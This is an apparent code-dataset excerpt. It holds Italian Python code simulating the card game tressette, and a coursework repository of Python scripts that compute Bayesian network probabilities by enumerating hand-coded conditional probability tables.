"text": "#coding=utf-8\n\nfrom __future__ import division, print_function\nimport carta\n\nclass Passata(object):\n\n def __init__(self, giocatori, primo_di_mano):\n self.giocatori = giocatori\n#i giocatori devono cominciare in ordine nella lista:\n self.primo_di_mano = primo_di_mano\n self.carte_giocate = [[0 for _ in range(4)] for _ in range(10)]\n#conta le battute:\n self.battuta_in_corso = 0\n#ricorda chi ha conquistato le battute precedenti\n self.vincitori_battute = []\n\n def battuta(self):\n \"\"\"gioca il primo di mano, poi gli altri tre a seguire, ricevendo come\n informazione tutte le carte uscite fino a quel momento.\n le carte giocate vengono salvate in self.carte_giocate a mano a mano\n che escono, per facilitare l'implementazione di\n Giocatore.gioca_carta()\"\"\"\n\n#crea un elemento della lista che conterrà le carte della battuta\n#aggiunge la giocata del primo giocatore\n battuta_in_corso = self.battuta_in_corso\n comanda = self.giocatori[self.primo_di_mano].gioca_carta(self.carte_giocate)\n self.carte_giocate[battuta_in_corso][self.primo_di_mano] = comanda\n for i in range(1, 4):\n num_giocatore = (self.primo_di_mano + i) % 4\n risposta = self.giocatori[num_giocatore].gioca_carta(self.carte_giocate)\n self.carte_giocate[battuta_in_corso][num_giocatore] = risposta\n \"\"\"controlla chi ha preso la battuta\"\"\"\n battuta_completa = self.carte_giocate[battuta_in_corso]\n piglia = carta.comanda_battuta(battuta_completa, self.primo_di_mano)\n comanda = battuta_completa[piglia]\n self.battuta_in_corso += 1\n self.vincitori_battute.append(piglia)\n print(battuta_completa)\n print('comanda il', comanda)\n#chi ha preso comincia la battuta seguente\n self.primo_di_mano = piglia\n print('prende il giocatore', piglia + 1, '\\n')\n\n def punteggi(self):\n \"\"\"Calcola i punti dei giocatori e quindi delle squadre\"\"\"\n punteggi_giocatori = [0 for giocatore in self.giocatori]\n for battuta, vincitore in zip(self.carte_giocate, self.vincitori_battute):\n punti_battuta = sum([c.punti for c in battuta])\n punteggi_giocatori[vincitore] += punti_battuta\n squadre = set([giocatore.squadra for giocatore in self.giocatori])\n punteggi_squadre = [(squadra, 0) for squadra in squadre]\n punteggi_squadre = dict(punteggi_squadre)\n for giocatore, punteggio in zip(self.giocatori, punteggi_giocatori):\n punteggi_squadre[giocatore.squadra] += punteggio\n for squadra in punteggi_squadre:\n punteggi_squadre[squadra] = punteggi_squadre[squadra] // 3\n squadra_tola = self.giocatori[self.vincitori_battute[-1]].squadra\n punteggi_squadre[squadra_tola] += 1\n print(punteggi_squadre[1])\n\n\n \n"
},
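A short sanity check of the scoring convention used in punteggi() above: card points are tallied in thirds and floor-divided by 3, with one extra point for the last trick. The whole-deck tally below is an invented example, assuming the carta module is importable.

import carta

mazzo = [carta.Carta(n) for n in range(40)]
terzi = sum(c.punti for c in mazzo)  # 4 aces at 3 thirds + 20 cards at 1 third = 32
print(terzi // 3 + 1)                # 10 card points + 1 for the last trick = 11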
{
"alpha_fraction": 0.6527050733566284,
"alphanum_fraction": 0.6998254656791687,
"avg_line_length": 22.875,
"blob_id": "7c5832d73041659e03fa987f88cfa787c4d852c7",
"content_id": "46e845926be5633a0ddee712f88b0c6e3fe6632b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 573,
"license_type": "no_license",
"max_line_length": 51,
"num_lines": 24,
"path": "/programma/tressette.py",
"repo_name": "Enucatl/tressette",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python\n#coding=utf-8\n\nfrom __future__ import division, print_function\nimport carta\nimport passata\nimport random\nimport giocatore\n\nmazzo = range(40)\nrandom.shuffle(mazzo)\nmazzo = [carta.Carta(x) for x in mazzo]\n\ngiocatori = [giocatore.Giocatore(mazzo[0:10], 1),\n giocatore.Giocatore(mazzo[10:20], 2),\n giocatore.Giocatore(mazzo[20:30], 1),\n giocatore.Giocatore(mazzo[30:40], 2)]\n\ncartaro = 3\nprimo_di_mano= (cartaro + 1) % 4\npassata = passata.Passata(giocatori, primo_di_mano)\nfor i in range(10):\n passata.battuta()\npassata.punteggi()\n"
}
] | 5 |
sayarghoshroy/Probabilistic_Graphical_Models_Coursework
|
https://github.com/sayarghoshroy/Probabilistic_Graphical_Models_Coursework
|
1ea161480b27c70e81019ec873328646697cc4f5
|
71d52ad5118e4dd4a8b8098b8fad1e8b094f0256
|
60122afd7f69fee602cd16966fe2996b481698fc
|
refs/heads/master
| 2022-11-26T17:17:42.750595 | 2020-07-31T16:47:23 | 2020-07-31T16:47:23 | 256,287,819 | 0 | 1 | null | null | null | null | null |
[
{
"alpha_fraction": 0.7444933652877808,
"alphanum_fraction": 0.7621145248413086,
"avg_line_length": 31.571428298950195,
"blob_id": "f11737f450ec1002ed1f45daa4b5974c36a3baeb",
"content_id": "a92c5ac5250743f3b5b267dd0d1ff13b1ebfec4a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 227,
"license_type": "no_license",
"max_line_length": 131,
"num_lines": 7,
"path": "/README.md",
"repo_name": "sayarghoshroy/Probabilistic_Graphical_Models_Coursework",
"src_encoding": "UTF-8",
"text": "# Probabilistic Graphical Models Coursework\n\n## Course Project\n### Bounds for VC Dimension\n- Reference Paper: [A note on bounds for VC dimensions](https://www.stat.washington.edu/jaw/JAW-papers/NR/jaw-vdv.IMSCOLL508v2.pdf)\n\n---"
},
{
"alpha_fraction": 0.4608599841594696,
"alphanum_fraction": 0.5292171835899353,
"avg_line_length": 28.29032325744629,
"blob_id": "1fa6bfa315e832da944ad068e56bb63a8ecd1afc",
"content_id": "195265febbf6ddc3ccf1395211e835d21dcccdc1",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 907,
"license_type": "no_license",
"max_line_length": 104,
"num_lines": 31,
"path": "/Codes_for_Bayesian_Network/net_B.py",
"repo_name": "sayarghoshroy/Probabilistic_Graphical_Models_Coursework",
"src_encoding": "UTF-8",
"text": "P_eh = {'l': 0.2, 'h': 0.8}\n\nP_oil_eh = {'ll':0.9, 'hl':0.1, 'lh':0.05, 'hh':0.95}\n\nP_bp_oil = {'lh': 0.1, 'nh': 0.4, 'hh': 0.5, 'll': 0.9, 'nl':0.1, 'hl': 0}\n\nP_rt_infeh = {'lll':0.9, 'hll':0.1, 'llh':0.1, 'hlh':0.9, 'lhl':0.1, 'hhl':0.9, 'lhh':0.01, 'hhh':0.99}\n\nP_inf_oileh = {'lll':0.9, 'hll':0.1, 'llh':0.1, 'hlh':0.9, 'lhl':0.1, 'hhl':0.9, 'lhh':0.01, 'hhh':0.99}\n\nsummer = ['l', 'h']\n\nnumer = denom = 0\n\nfor oil in summer:\n\tfor eh in summer:\n\t\tprod = P_rt_infeh['hh'+eh]*P_inf_oileh['h'+oil+eh]*P_bp_oil['n'+oil]*P_oil_eh[oil+eh]*P_eh[eh]\n\t\tnumer += prod\n\nprint(\"Numerator: \" + str(numer))\n\nfor oil in summer:\n\tfor eh in summer:\n\t\tfor inf in summer:\n\t\t\tprod = P_rt_infeh['h'+inf+eh]*P_inf_oileh[inf+oil+eh]*P_bp_oil['n'+oil]*P_oil_eh[oil+eh]*P_eh[eh]\n\t\t\tprint(\"term: \" + str(prod) + \" \" + inf + oil + eh)\n\t\t\tdenom += prod\n\nprint(\"Denominator: \" + str(denom))\n\nprint(\"Result: \" + str(numer / denom))"
},
{
"alpha_fraction": 0.32195845246315,
"alphanum_fraction": 0.4480712115764618,
"avg_line_length": 24.452829360961914,
"blob_id": "16561228b4fb0427e8da7c88d2359f4394e4b2d7",
"content_id": "e0d3321c855f8178710d76b2e2215c9c306015e7",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1348,
"license_type": "no_license",
"max_line_length": 104,
"num_lines": 53,
"path": "/Codes_for_Bayesian_Network/net_A.py",
"repo_name": "sayarghoshroy/Probabilistic_Graphical_Models_Coursework",
"src_encoding": "UTF-8",
"text": "P_a = {'1': 0.01, '0': 0.99}\nP_s = {'1': 0.5, '0': 0.5}\n\nP_t_a = {'11': 0.05, '01': 0.95, '10': 0.01, '00': 0.99}\n\nP_l_s = {'11': 0.1, '01': 0.9, '10': 0.01, '00': 0.99}\n\nP_b_s = {'11': 0.6, '01': 0.4, '10': 0.3, '00': 0.7}\n\nP_x_e = {'11': 0.98, '01': 0.02, '10': 0.05, '00': 0.95}\n\nP_e_tl = {'100': 0, '000': 1, '110': 1, '010': 0, '101': 1, '001': 0, '111':1, '011': 0}\n\nP_d_eb = {'100': 0.1, '000': 0.9, '110': 0.7, '010': 0.3, '101': 0.8, '001': 0.2, '111':0.9, '011': 0.1}\n\nbinary = ['0', '1']\n\nsum = 0\nfor e in binary:\n\tfor b in binary:\n\t\tfor l in binary:\n\t\t\tfor t in binary:\n\t\t\t\tfor s in binary:\n\t\t\t\t\tfor a in binary:\n\t\t\t\t\t\tprod = P_d_eb['1'+e+b] * P_e_tl[e+t+l] * P_b_s[b+s] * P_l_s[l+s] * P_t_a[t+a] * P_a[a] * P_s[s]\n\t\t\t\t\t\tsum += prod\n\nprint(\"P(d = true) = \" + str(sum))\n\nsum = 0\nfor e in binary:\n\tfor b in binary:\n\t\tfor l in binary:\n\t\t\tfor t in binary:\n\t\t\t\tfor s in ['1']:\n\t\t\t\t\tfor a in binary:\n\t\t\t\t\t\tprod = P_d_eb['1'+e+b] * P_e_tl[e+t+l] * P_b_s[b+s] * P_l_s[l+s] * P_t_a[t+a] * P_a[a]\n\t\t\t\t\t\tsum += prod\n\nprint(\"P(d = true | s = true) = \" + str(sum))\n\n\nsum = 0\nfor e in binary:\n\tfor b in binary:\n\t\tfor l in binary:\n\t\t\tfor t in binary:\n\t\t\t\tfor s in ['0']:\n\t\t\t\t\tfor a in binary:\n\t\t\t\t\t\tprod = P_d_eb['1'+e+b] * P_e_tl[e+t+l] * P_b_s[b+s] * P_l_s[l+s] * P_t_a[t+a] * P_a[a]\n\t\t\t\t\t\tsum += prod\n\nprint(\"P(d = true | s = false) = \" + str(sum))"
},
{
"alpha_fraction": 0.36645427346229553,
"alphanum_fraction": 0.4463578462600708,
"avg_line_length": 26.137849807739258,
"blob_id": "3ffb4d9f6360c811f2c03c76067ad51ec9aedad1",
"content_id": "50ded2680f16499d38aa77195dc217985e1522f0",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 11614,
"license_type": "no_license",
"max_line_length": 179,
"num_lines": 428,
"path": "/Codes_for_Bayesian_Network/net_from_AI_mini_project/net.py",
"repo_name": "sayarghoshroy/Probabilistic_Graphical_Models_Coursework",
"src_encoding": "UTF-8",
"text": "def D(str):\n\t# CPT Table for Variable D\n\tif(str == '0'):\n\t\treturn 0.1\n\telif(str == '1 or 2'):\n\t\treturn 0.7\n\treturn 0.2\n\ndef Ex(str):\n\t# CPT Table for Variable Ex\n\tif(str == 'True'):\n\t\treturn 0.3\n\treturn 0.7\n\ndef Q(str):\n\t# CPT Table for Variable Q\n\tif(str == '0'):\n\t\treturn 0.6\n\telif(str == '1'):\n\t\treturn 0.3\n\treturn 0.1\n\ndef Ev(str):\n\t# CPT Table for Variable Ev\n\tif(str == 'True'):\n\t\treturn 0.7\n\treturn 0.3\n\ndef Te(str):\n\t# CPT Table for Variable Te\n\tif(str == 'True'):\n\t\treturn 0.75\n\treturn 0.25\n\ndef H(str):\n\t# CPT Table for Variable H\n\tif(str == '0'):\n\t\treturn 0.7\n\telif(str == '1'):\n\t\treturn 0.28\n\treturn 0.02\n\ndef F(tup, str):\n\t# CPT Table for Variable F\n\tif(str == 'Negligible'):\n\t\tif(tup == ('True')):\n\t\t\treturn 0.95\n\t\treturn 0.25\n\n\tif(tup == ('True')):\n\t\treturn 0.05\n\treturn 0.75\n\ndef T(tup, str):\n\t# CPT Table for Variable T\n\tif(str == '< 6 hrs'):\n\t\tif(tup ==('Low', '0')):\n\t\t\treturn 0.6\n\t\tif(tup ==('Low', '1')):\n\t\t\treturn 0.55\n\t\tif(tup ==('Low', '2')):\n\t\t\treturn 0.5\n\t\tif(tup ==('Average', '0')):\n\t\t\treturn 0.85\n\t\tif(tup ==('Average', '1')):\n\t\t\treturn 0.8\n\t\tif(tup ==('Average', '2')):\n\t\t\treturn 0.75\n\t\tif(tup ==('High', '0')):\n\t\t\treturn 0.99\n\t\tif(tup ==('High', '1')):\n\t\t\treturn 0.95\n\t\tif(tup ==('High', '2')):\n\t\t\treturn 0.9\n\n\telif(str == '6 to 12 hrs'):\n\t\tif(tup ==('Low', '0')):\n\t\t\treturn 0.3\n\t\tif(tup ==('Low', '1')):\n\t\t\treturn 0.33\n\t\tif(tup ==('Low', '2')):\n\t\t\treturn 0.35\n\t\tif(tup ==('Average', '0')):\n\t\t\treturn 0.1\n\t\tif(tup ==('Average', '1')):\n\t\t\treturn 0.12\n\t\tif(tup ==('Average', '2')):\n\t\t\treturn 0.15\n\t\tif(tup ==('High', '0')):\n\t\t\treturn 0.009\n\t\tif(tup ==('High', '1')):\n\t\t\treturn 0.04\n\t\tif(tup ==('High', '2')):\n\t\t\treturn 0.08\n\n\tif(tup ==('Low', '0')):\n\t\treturn 0.1\n\tif(tup ==('Low', '1')):\n\t\treturn 0.12\n\tif(tup ==('Low', '2')):\n\t\treturn 0.15\n\tif(tup ==('Average', '0')):\n\t\treturn 0.05\n\tif(tup ==('Average', '1')):\n\t\treturn 0.08\n\tif(tup ==('Average', '2')):\n\t\treturn 0.1\n\tif(tup ==('High', '0')):\n\t\treturn 0.001\n\tif(tup ==('High', '1')):\n\t\treturn 0.01\n\tif(tup ==('High', '2')):\n\t\treturn 0.02\n\ndef B(tup, str):\n\t# CPT Table for Variable B\n\n\tif(str == '1'):\n\t\tif (tup == ('Negligible', '< 6 hrs') ):\n\t\t\treturn 0.1\n\t\tif (tup == ('Negligible', '6 to 12 hrs') ):\n\t\t\treturn 0.3\n\t\tif (tup == ('Negligible', '> 12 hrs') ):\n\t\t\treturn 0.7\n\t\tif (tup == ('Substantial', '< 6 hrs') ):\n\t\t\treturn 0.01\n\t\tif (tup == ('Substantial', '6 to 12 hrs') ):\n\t\t\treturn 0.05\n\t\tif (tup == ('Substantial', '> 12 hrs') ):\n\t\t\treturn 0.1\n\n\tif(str == '2'):\n\t\tif (tup == ('Negligible', '< 6 hrs') ):\n\t\t\treturn 0.2\n\t\tif (tup == ('Negligible', '6 to 12 hrs') ):\n\t\t\treturn 0.3\n\t\tif (tup == ('Negligible', '> 12 hrs') ):\n\t\t\treturn 0.2\n\t\tif (tup == ('Substantial', '< 6 hrs') ):\n\t\t\treturn 0.04\n\t\tif (tup == ('Substantial', '6 to 12 hrs') ):\n\t\t\treturn 0.15\n\t\tif (tup == ('Substantial', '> 12 hrs') ):\n\t\t\treturn 0.3\n\n\tif (tup == ('Negligible', '< 6 hrs') ):\n\t\treturn 0.7\n\tif (tup == ('Negligible', '6 to 12 hrs') ):\n\t\treturn 0.4\n\tif (tup == ('Negligible', '> 12 hrs') ):\n\t\treturn 0.1\n\tif (tup == ('Substantial', '< 6 hrs') ):\n\t\treturn 0.95\n\tif (tup == ('Substantial', '6 to 12 hrs') ):\n\t\treturn 0.8\n\telse:\n\t\treturn 0.6\n\ndef W(tup, str):\n\t# CPT 
Table for Variable W\n\tif(str == 'Low'):\n\t\tif ( tup == ( '0', 'True', '0', 'True' ) ):\n\t\t\treturn 0.166\n\t\tif ( tup == ( '0', 'True', '0', 'False' ) ):\n\t\t\treturn 0.227\n\t\tif ( tup == ( '0', 'True', '1', 'True' ) ):\n\t\t\treturn 0.141\n\t\tif ( tup == ( '0', 'True', '1', 'False' ) ):\n\t\t\treturn 0.203\n\t\tif ( tup == ( '0', 'True', '> 2', 'True' ) ):\n\t\t\treturn 0.110\n\t\tif ( tup == ( '0', 'True', '> 2', 'False' ) ):\n\t\t\treturn 0.178\n\t\tif ( tup == ( '0', 'False', '0', 'True' ) ):\n\t\t\treturn 0.289\n\t\tif ( tup == ( '0', 'False', '0', 'False' ) ):\n\t\t\treturn 0.35\n\t\tif ( tup == ( '0', 'False', '1', 'True' ) ):\n\t\t\treturn 0.264\n\t\tif ( tup == ( '0', 'False', '1', 'False' ) ):\n\t\t\treturn 0.325\n\t\tif ( tup == ( '0', 'False', '> 2', 'True' ) ):\n\t\t\treturn 0.239\n\t\tif ( tup == ( '0', 'False', '> 2', 'False' ) ):\n\t\t\treturn 0.301\n\t\tif ( tup == ( '1 or 2', 'True', '0', 'True' ) ):\n\t\t\treturn 0.129\n\t\tif ( tup == ( '1 or 2', 'True', '0', 'False' ) ):\n\t\t\treturn 0.19\n\t\tif ( tup == ( '1 or 2', 'True', '1', 'True' ) ):\n\t\t\treturn 0.104\n\t\tif ( tup == ( '1 or 2', 'True', '1', 'False' ) ):\n\t\t\treturn 0.166\n\t\tif ( tup == ( '1 or 2', 'True', '> 2', 'True' ) ):\n\t\t\treturn 0.08\n\t\tif ( tup == ( '1 or 2', 'True', '> 2', 'False' ) ):\n\t\t\treturn 0.141\n\t\tif ( tup == ( '1 or 2', 'False', '0', 'True' ) ):\n\t\t\treturn 0.250\n\t\tif ( tup == ( '1 or 2', 'False', '0', 'False' ) ):\n\t\t\treturn 0.313\n\t\tif ( tup == ( '1 or 2', 'False', '1', 'True' ) ):\n\t\t\treturn 0.227\n\t\tif ( tup == ( '1 or 2', 'False', '1', 'False' ) ):\n\t\t\treturn 0.289\n\t\tif ( tup == ( '1 or 2', 'False', '> 2', 'True' ) ):\n\t\t\treturn 0.203\n\t\tif ( tup == ( '1 or 2', 'False', '> 2', 'False' ) ):\n\t\t\treturn 0.264\n\t\tif ( tup == ( '> 3', 'True', '0', 'True' ) ):\n\t\t\treturn 0.055\n\t\tif ( tup == ( '> 3', 'True', '0', 'False' ) ):\n\t\t\treturn 0.113\n\t\tif ( tup == ( '> 3', 'True', '1', 'True' ) ):\n\t\t\treturn 0.031\n\t\tif ( tup == ( '> 3', 'True', '1', 'False' ) ):\n\t\t\treturn 0.092\n\t\tif ( tup == ( '> 3', 'True', '> 2', 'True' ) ):\n\t\t\treturn 0.006\n\t\tif ( tup == ( '> 3', 'True', '> 2', 'False' ) ):\n\t\t\treturn 0.068\n\t\tif ( tup == ( '> 3', 'False', '0', 'True' ) ):\n\t\t\treturn 0.178\n\t\tif ( tup == ( '> 3', 'False', '0', 'False' ) ):\n\t\t\treturn 0.239\n\t\tif ( tup == ( '> 3', 'False', '1', 'True' ) ):\n\t\t\treturn 0.154\n\t\tif ( tup == ( '> 3', 'False', '1', 'False' ) ):\n\t\t\treturn 0.215\n\t\tif ( tup == ( '> 3', 'False', '> 2', 'True' ) ):\n\t\t\treturn 0.129\n\t\tif ( tup == ( '> 3', 'False', '> 2', 'False' ) ):\n\t\t\treturn 0.19\n\n\tif(str == 'Average'):\n\t\tif ( tup == ( '0', 'True', '0', 'True' ) ):\n\t\t\treturn 0.308\n\t\tif ( tup == ( '0', 'True', '0', 'False' ) ):\n\t\t\treturn 0.422\n\t\tif ( tup == ( '0', 'True', '1', 'True' ) ):\n\t\t\treturn 0.262\n\t\tif ( tup == ( '0', 'True', '1', 'False' ) ):\n\t\t\treturn 0.376\n\t\tif ( tup == ( '0', 'True', '> 2', 'True' ) ):\n\t\t\treturn 0.217\n\t\tif ( tup == ( '0', 'True', '> 2', 'False' ) ):\n\t\t\treturn 0.331\n\t\tif ( tup == ( '0', 'False', '0', 'True' ) ):\n\t\t\treturn 0.536\n\t\tif ( tup == ( '0', 'False', '0', 'False' ) ):\n\t\t\treturn 0.65\n\t\tif ( tup == ( '0', 'False', '1', 'True' ) ):\n\t\t\treturn 0.49\n\t\tif ( tup == ( '0', 'False', '1', 'False' ) ):\n\t\t\treturn 0.604\n\t\tif ( tup == ( '0', 'False', '> 2', 'True' ) ):\n\t\t\treturn 0.445\n\t\tif ( tup == ( '0', 'False', '> 2', 'False' ) ):\n\t\t\treturn 0.559\n\t\tif ( tup 
== ( '1 or 2', 'True', '0', 'True' ) ):\n\t\t\treturn 0.239\n\t\tif ( tup == ( '1 or 2', 'True', '0', 'False' ) ):\n\t\t\treturn 0.354\n\t\tif ( tup == ( '1 or 2', 'True', '1', 'True' ) ):\n\t\t\treturn 0.194\n\t\tif ( tup == ( '1 or 2', 'True', '1', 'False' ) ):\n\t\t\treturn 0.308\n\t\tif ( tup == ( '1 or 2', 'True', '> 2', 'True' ) ):\n\t\t\treturn 0.148\n\t\tif ( tup == ( '1 or 2', 'True', '> 2', 'False' ) ):\n\t\t\treturn 0.262\n\t\tif ( tup == ( '1 or 2', 'False', '0', 'True' ) ):\n\t\t\treturn 0.468\n\t\tif ( tup == ( '1 or 2', 'False', '0', 'False' ) ):\n\t\t\treturn 0.582\n\t\tif ( tup == ( '1 or 2', 'False', '1', 'True' ) ):\n\t\t\treturn 0.422\n\t\tif ( tup == ( '1 or 2', 'False', '1', 'False' ) ):\n\t\t\treturn 0.536\n\t\tif ( tup == ( '1 or 2', 'False', '> 2', 'True' ) ):\n\t\t\treturn 0.376\n\t\tif ( tup == ( '1 or 2', 'False', '> 2', 'False' ) ):\n\t\t\treturn 0.49\n\t\tif ( tup == ( '> 3', 'True', '0', 'True' ) ):\n\t\t\treturn 0.103\n\t\tif ( tup == ( '> 3', 'True', '0', 'False' ) ):\n\t\t\treturn 0.217\n\t\tif ( tup == ( '> 3', 'True', '1', 'True' ) ):\n\t\t\treturn 0.057\n\t\tif ( tup == ( '> 3', 'True', '1', 'False' ) ):\n\t\t\treturn 0.171\n\t\tif ( tup == ( '> 3', 'True', '> 2', 'True' ) ):\n\t\t\treturn 0.011\n\t\tif ( tup == ( '> 3', 'True', '> 2', 'False' ) ):\n\t\t\treturn 0.125\n\t\tif ( tup == ( '> 3', 'False', '0', 'True' ) ):\n\t\t\treturn 0.331\n\t\tif ( tup == ( '> 3', 'False', '0', 'False' ) ):\n\t\t\treturn 0.445\n\t\tif ( tup == ( '> 3', 'False', '1', 'True' ) ):\n\t\t\treturn 0.285\n\t\tif ( tup == ( '> 3', 'False', '1', 'False' ) ):\n\t\t\treturn 0.399\n\t\tif ( tup == ( '> 3', 'False', '> 2', 'True' ) ):\n\t\t\treturn 0.239\n\t\tif ( tup == ( '> 3', 'False', '> 2', 'False' ) ):\n\t\t\treturn 0.354\n\n\telse:\n\t\tif ( tup == ( '0', 'True', '0', 'True' ) ):\n\t\t\treturn 0.526\n\t\tif ( tup == ( '0', 'True', '0', 'False' ) ):\n\t\t\treturn 0.351\n\t\tif ( tup == ( '0', 'True', '1', 'True' ) ):\n\t\t\treturn 0.596\n\t\tif ( tup == ( '0', 'True', '1', 'False' ) ):\n\t\t\treturn 0.421\n\t\tif ( tup == ( '0', 'True', '> 2', 'True' ) ):\n\t\t\treturn 0.667\n\t\tif ( tup == ( '0', 'True', '> 2', 'False' ) ):\n\t\t\treturn 0.491\n\t\tif ( tup == ( '0', 'False', '0', 'True' ) ):\n\t\t\treturn 0.175\n\t\tif ( tup == ( '0', 'False', '0', 'False' ) ):\n\t\t\treturn 0\n\t\tif ( tup == ( '0', 'False', '1', 'True' ) ):\n\t\t\treturn 0.246\n\t\tif ( tup == ( '0', 'False', '1', 'False' ) ):\n\t\t\treturn 0.07\n\t\tif ( tup == ( '0', 'False', '> 2', 'True' ) ):\n\t\t\treturn 0.316\n\t\tif ( tup == ( '0', 'False', '> 2', 'False' ) ):\n\t\t\treturn 0.14\n\t\tif ( tup == ( '1 or 2', 'True', '0', 'True' ) ):\n\t\t\treturn 0.632\n\t\tif ( tup == ( '1 or 2', 'True', '0', 'False' ) ):\n\t\t\treturn 0.456\n\t\tif ( tup == ( '1 or 2', 'True', '1', 'True' ) ):\n\t\t\treturn 0.702\n\t\tif ( tup == ( '1 or 2', 'True', '1', 'False' ) ):\n\t\t\treturn 0.526\n\t\tif ( tup == ( '1 or 2', 'True', '> 2', 'True' ) ):\n\t\t\treturn 0.772\n\t\tif ( tup == ( '1 or 2', 'True', '> 2', 'False' ) ):\n\t\t\treturn 0.596\n\t\tif ( tup == ( '1 or 2', 'False', '0', 'True' ) ):\n\t\t\treturn 0.281\n\t\tif ( tup == ( '1 or 2', 'False', '0', 'False' ) ):\n\t\t\treturn 0.105\n\t\tif ( tup == ( '1 or 2', 'False', '1', 'True' ) ):\n\t\t\treturn 0.351\n\t\tif ( tup == ( '1 or 2', 'False', '1', 'False' ) ):\n\t\t\treturn 0.175\n\t\tif ( tup == ( '1 or 2', 'False', '> 2', 'True' ) ):\n\t\t\treturn 0.421\n\t\tif ( tup == ( '1 or 2', 'False', '> 2', 'False' ) ):\n\t\t\treturn 0.246\n\t\tif ( tup == ( '> 3', 
'True', '0', 'True' ) ):\n\t\t\treturn 0.842\n\t\tif ( tup == ( '> 3', 'True', '0', 'False' ) ):\n\t\t\treturn 0.667\n\t\tif ( tup == ( '> 3', 'True', '1', 'True' ) ):\n\t\t\treturn 0.912\n\t\tif ( tup == ( '> 3', 'True', '1', 'False' ) ):\n\t\t\treturn 0.737\n\t\tif ( tup == ( '> 3', 'True', '> 2', 'True' ) ):\n\t\t\treturn 0.982\n\t\tif ( tup == ( '> 3', 'True', '> 2', 'False' ) ):\n\t\t\treturn 0.807\n\t\tif ( tup == ( '> 3', 'False', '0', 'True' ) ):\n\t\t\treturn 0.491\n\t\tif ( tup == ( '> 3', 'False', '0', 'False' ) ):\n\t\t\treturn 0.316\n\t\tif ( tup == ( '> 3', 'False', '1', 'True' ) ):\n\t\t\treturn 0.561\n\t\tif ( tup == ( '> 3', 'False', '1', 'False' ) ):\n\t\t\treturn 0.386\n\t\tif ( tup == ( '> 3', 'False', '> 2', 'True' ) ):\n\t\t\treturn 0.632\n\t\telse:\n\t\t\treturn 0.456\n\ndef domain(str):\n\tif(str == 'D'):\n\t\treturn ['0', '1 or 2', '> 3']\n\tif(str == 'Ex'):\n\t\treturn ['True', 'False']\n\tif(str == 'Q'):\n\t\treturn ['0', '1', '> 2']\n\tif(str == 'Ev'):\n\t\treturn ['True', 'False']\n\tif(str == 'Te'):\n\t\treturn ['True', 'False']\n\tif(str == 'W'):\n\t\treturn ['Low', 'Average', 'High']\n\tif(str == 'H'):\n\t\treturn ['0', '1', '2']\n\tif(str == 'F'):\n\t\treturn ['Negligible', 'Substantial']\n\tif(str == 'T'):\n\t\treturn ['< 6 hrs', '6 to 12 hrs', '> 12 hrs']\n\tif(str == 'B'):\n\t\treturn ['1', '2', '3' ]\n\nsumming = 0\nfor b in domain('B'):\n\tfor d in domain('D'):\n\t\tfor ex in domain('Ex'):\n\t\t\tfor q in domain('Q'):\n\t\t\t\tfor ev in domain('Ev'):\n\t\t\t\t\tfor w in domain('W'):\n\t\t\t\t\t\tfor h in domain('H'):\n\t\t\t\t\t\t\tfor t in domain('T'):\n\t\t\t\t\t\t\t\tsumming = summing + (float)(F(('True'), 'Negligible') * Te('True') * D(d) * Ex(ex) * Q(q) * Ev(ev) * B(('Negligible', t), b) * W( (d, ex, q, ev), w) * H(h) * T((w, h), t))\n\nsum_num = 0\nb = '1'\n\nfor d in domain('D'):\n\tfor ex in domain('Ex'):\n\t\tfor q in domain('Q'):\n\t\t\tfor ev in domain('Ev'):\n\t\t\t\tfor w in domain('W'):\n\t\t\t\t\tfor h in domain('H'):\n\t\t\t\t\t\tfor t in domain('T'):\n\t\t\t\t\t\t\tsum_num = sum_num + (float)(F(('True'), 'Negligible') * Te('True') * D(d) * Ex(ex) * Q(q) * Ev(ev) * B(('Negligible', t), b) * W( (d, ex, q, ev), w) * H(h) * T((w, h), t))\n\nprint(\"Required Probability = \", (sum_num / summing))"
}
] | 4 |
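The three scripts in this repository follow the same inference-by-enumeration pattern: multiply every CPT entry over a full assignment, sum over the hidden variables, and divide the evidence-plus-query sum by the evidence-only sum. Below is a generic, self-contained sketch of that pattern; the two-variable rain/wet network and the helper name enumerate_query are invented for illustration and are not part of the repository.

# A minimal inference-by-enumeration helper, assuming factors are plain
# functions of an assignment dict (one factor per CPT).
import itertools

def enumerate_query(query_var, query_val, evidence, domains, factors):
    """P(query_var = query_val | evidence), computed by summing the joint."""
    numer = denom = 0.0
    names = list(domains)
    for values in itertools.product(*(domains[v] for v in names)):
        assignment = dict(zip(names, values))
        # skip assignments that contradict the evidence
        if any(assignment[v] != val for v, val in evidence.items()):
            continue
        p = 1.0
        for factor in factors:
            p *= factor(assignment)  # product of all CPT entries
        denom += p
        if assignment[query_var] == query_val:
            numer += p
    return numer / denom

# invented toy network: rain -> wet
domains = {'rain': [0, 1], 'wet': [0, 1]}
factors = [
    lambda a: 0.2 if a['rain'] else 0.8,          # P(rain)
    lambda a: ((0.9 if a['wet'] else 0.1) if a['rain']
               else (0.1 if a['wet'] else 0.9)),  # P(wet | rain)
]
print(enumerate_query('rain', 1, {'wet': 1}, domains, factors))  # ~0.6923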